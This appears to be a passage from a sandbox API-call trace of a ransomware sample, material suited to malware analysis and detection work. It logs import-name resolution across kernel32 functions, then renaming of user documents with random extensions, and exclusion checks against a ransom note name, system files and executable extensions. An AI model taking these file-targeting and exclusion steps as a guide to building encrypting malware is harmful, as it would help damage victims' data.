lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.737] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.737] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.737] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.737] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.737] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.737] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.737] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.737] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.737] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.737] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.737] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.737] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.737] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.737] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.737] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.737] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.737] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.737] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.738] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.738] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.738] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.738] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.738] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.738] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.738] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.738] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.738] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.738] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.738] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.738] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.738] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.738] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.738] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.738] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.738] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.738] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.738] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.739] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.739] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.739] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.739] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.739] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.739] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.739] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.739] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.739] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.739] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.739] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.739] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.739] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.739] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.739] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.739] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.739] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.739] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.739] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.740] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.740] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.740] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.740] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.740] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.740] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.740] lstrlenA (lpString="DELETEATOM") returned 10 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.740] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.740] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.740] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.740] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.740] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.740] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.740] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.740] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.740] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.740] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.740] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.740] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.741] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.741] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.741] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.741] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.741] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.741] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.741] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.741] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.741] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.741] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.741] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.741] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.741] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.741] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.741] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.741] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.741] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.741] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.741] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.742] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.742] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.742] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.742] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.742] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.742] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.742] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.742] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.742] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.742] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.742] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.742] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.742] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.742] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods") returned 89 [0084.742] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods.tmJ7hl") returned 96 [0084.742] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\usqtceso0o.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods.tmJ7hl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\usqtceso0o.ods.tmj7hl"), dwFlags=0x0) returned 1 [0084.743] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.743] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.743] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.744] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c64e2c0, ftCreationTime.dwHighDateTime=0x1d4cb48, ftLastAccessTime.dwLowDateTime=0x10aef4d0, ftLastAccessTime.dwHighDateTime=0x1d4cdf5, ftLastWriteTime.dwLowDateTime=0x10aef4d0, ftLastWriteTime.dwHighDateTime=0x1d4cdf5, nFileSizeHigh=0x0, nFileSizeLow=0x119da, dwReserved0=0x0, dwReserved1=0x0, cFileName="USQTCeso0O.ods", cAlternateFileName="USQTCE~1.ODS")) returned 0 [0084.744] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0084.744] CloseHandle (hObject=0x428) returned 1 [0084.744] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46ee7d50, ftCreationTime.dwHighDateTime=0x1d4d4de, ftLastAccessTime.dwLowDateTime=0xe78a1900, ftLastAccessTime.dwHighDateTime=0x1d4d29e, ftLastWriteTime.dwLowDateTime=0xe78a1900, ftLastWriteTime.dwHighDateTime=0x1d4d29e, nFileSizeHigh=0x0, nFileSizeLow=0xe996, dwReserved0=0x0, dwReserved1=0x0, cFileName="NWlwXgs0t5N.rtf", cAlternateFileName="NWLWXG~1.RTF")) returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="DECRYPT-FILES.txt") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="autorun.inf") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="boot.ini") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="desktop.ini") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="ntuser.dat") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="iconcache.db") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="bootsect.bak") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="ntuser.dat.log") returned 1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="thumbs.db") returned -1 [0084.744] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf", lpString2="Bootfont.bin") returned 1 [0084.744] lstrlenW (lpString="NWlwXgs0t5N.rtf") returned 15 [0084.744] lstrcmpiW (lpString1="rtf", lpString2="lnk") returned 1 [0084.744] lstrcmpiW (lpString1="rtf", lpString2="exe") returned 1 [0084.744] lstrcmpiW (lpString1="rtf", lpString2="sys") returned -1 [0084.744] lstrcmpiW (lpString1="rtf", lpString2="dll") returned 1 [0084.744] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.744] lstrlenW (lpString="NWlwXgs0t5N.rtf") returned 15 [0084.744] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.744] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="NWlwXgs0t5N.rtf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf" [0084.744] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf" (normalized: "c:\\users\\5p5nrgjn0js 